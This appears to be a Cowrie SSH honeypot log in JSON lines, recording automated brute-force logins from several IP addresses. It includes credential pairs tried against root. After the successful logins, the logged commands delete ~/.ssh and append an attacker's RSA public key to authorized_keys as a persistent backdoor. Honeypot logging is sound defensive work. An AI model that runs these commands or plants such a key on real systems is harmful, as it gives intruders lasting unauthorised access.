{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:27:21.667496Z","src_ip":"45.159.112.103","session":"2bd649b5d1fe"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:27:22.123765Z","src_ip":"45.159.112.103","session":"2bd649b5d1fe"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:27:23.229059Z","src_ip":"45.159.112.103","session":"2bd649b5d1fe"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":37946,"dst_ip":"1.2.3.4","dst_port":22,"session":"8526d6933b0d","protocol":"ssh","message":"New connection: 45.159.112.103:37946 (1.2.3.4:22) [session: 8526d6933b0d]","sensor":"my-vps","timestamp":"2025-08-26T00:27:23.329241Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:27:23.330216Z","src_ip":"45.159.112.103","session":"8526d6933b0d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:27:23.432194Z","src_ip":"45.159.112.103","session":"8526d6933b0d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:27:23.880729Z","src_ip":"45.159.112.103","session":"8526d6933b0d"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:27:23.984082Z","src_ip":"45.159.112.103","session":"8526d6933b0d"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:27:23.990446Z","src_ip":"45.159.112.103","session":"9a3db9c9043f"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":58806,"dst_ip":"1.2.3.4","dst_port":22,"session":"149eb5c309c1","protocol":"ssh","message":"New connection: 24.108.102.132:58806 (1.2.3.4:22) [session: 149eb5c309c1]","sensor":"my-vps","timestamp":"2025-08-26T00:27:39.786881Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:27:39.792037Z","src_ip":"24.108.102.132","session":"149eb5c309c1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:27:39.965680Z","src_ip":"24.108.102.132","session":"149eb5c309c1"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin@2021","message":"login attempt [root/Admin@2021] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:27:40.671152Z","src_ip":"24.108.102.132","session":"149eb5c309c1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:27:41.079139Z","src_ip":"24.108.102.132","session":"149eb5c309c1"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:27:41.079908Z","src_ip":"24.108.102.132","session":"149eb5c309c1"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:27:41.080704Z","src_ip":"24.108.102.132","session":"149eb5c309c1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:27:41.257600Z","src_ip":"24.108.102.132","session":"149eb5c309c1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:27:41.634747Z","src_ip":"24.108.102.132","session":"149eb5c309c1"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:27:41.635522Z","src_ip":"24.108.102.132","session":"149eb5c309c1"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:27:41.815389Z","src_ip":"24.108.102.132","session":"149eb5c309c1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:27:41.816458Z","src_ip":"24.108.102.132","session":"149eb5c309c1"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":58812,"dst_ip":"1.2.3.4","dst_port":22,"session":"4a67e65757f3","protocol":"ssh","message":"New connection: 24.108.102.132:58812 (1.2.3.4:22) [session: 4a67e65757f3]","sensor":"my-vps","timestamp":"2025-08-26T00:27:41.956479Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:27:41.961732Z","src_ip":"24.108.102.132","session":"4a67e65757f3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:27:42.123945Z","src_ip":"24.108.102.132","session":"4a67e65757f3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:27:42.789375Z","src_ip":"24.108.102.132","session":"4a67e65757f3"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:27:43.956484Z","src_ip":"24.108.102.132","session":"4a67e65757f3"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":58816,"dst_ip":"1.2.3.4","dst_port":22,"session":"645edec41b80","protocol":"ssh","message":"New connection: 24.108.102.132:58816 (1.2.3.4:22) [session: 645edec41b80]","sensor":"my-vps","timestamp":"2025-08-26T00:27:44.107230Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:27:44.117319Z","src_ip":"24.108.102.132","session":"645edec41b80"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:27:44.279993Z","src_ip":"24.108.102.132","session":"645edec41b80"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:27:44.940206Z","src_ip":"24.108.102.132","session":"645edec41b80"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:27:45.102919Z","src_ip":"24.108.102.132","session":"645edec41b80"}
{"eventid":"cowrie.session.closed","duration":"5.3","message":"Connection lost after 5.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:27:45.112157Z","src_ip":"24.108.102.132","session":"149eb5c309c1"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":50064,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ab961b6156b","protocol":"ssh","message":"New connection: 36.89.28.139:50064 (1.2.3.4:22) [session: 7ab961b6156b]","sensor":"my-vps","timestamp":"2025-08-26T00:28:06.424102Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:28:06.425066Z","src_ip":"36.89.28.139","session":"7ab961b6156b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:28:06.613706Z","src_ip":"36.89.28.139","session":"7ab961b6156b"}
{"eventid":"cowrie.login.success","username":"root","password":"admin@123456","message":"login attempt [root/admin@123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:28:07.408245Z","src_ip":"36.89.28.139","session":"7ab961b6156b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:28:07.852869Z","src_ip":"36.89.28.139","session":"7ab961b6156b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:28:07.853812Z","src_ip":"36.89.28.139","session":"7ab961b6156b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:28:07.855124Z","src_ip":"36.89.28.139","session":"7ab961b6156b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:28:08.044153Z","src_ip":"36.89.28.139","session":"7ab961b6156b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:28:08.439693Z","src_ip":"36.89.28.139","session":"7ab961b6156b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:28:08.440428Z","src_ip":"36.89.28.139","session":"7ab961b6156b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:28:08.632557Z","src_ip":"36.89.28.139","session":"7ab961b6156b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:28:08.633626Z","src_ip":"36.89.28.139","session":"7ab961b6156b"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":50078,"dst_ip":"1.2.3.4","dst_port":22,"session":"1e54ba43d6ee","protocol":"ssh","message":"New connection: 36.89.28.139:50078 (1.2.3.4:22) [session: 1e54ba43d6ee]","sensor":"my-vps","timestamp":"2025-08-26T00:28:09.797125Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:28:09.798017Z","src_ip":"36.89.28.139","session":"1e54ba43d6ee"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:28:09.972950Z","src_ip":"36.89.28.139","session":"1e54ba43d6ee"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:28:10.713400Z","src_ip":"36.89.28.139","session":"1e54ba43d6ee"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:28:12.357592Z","src_ip":"36.89.28.139","session":"1e54ba43d6ee"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":50088,"dst_ip":"1.2.3.4","dst_port":22,"session":"4d12b6ab56b1","protocol":"ssh","message":"New connection: 36.89.28.139:50088 (1.2.3.4:22) [session: 4d12b6ab56b1]","sensor":"my-vps","timestamp":"2025-08-26T00:28:12.578341Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:28:12.579242Z","src_ip":"36.89.28.139","session":"4d12b6ab56b1"}
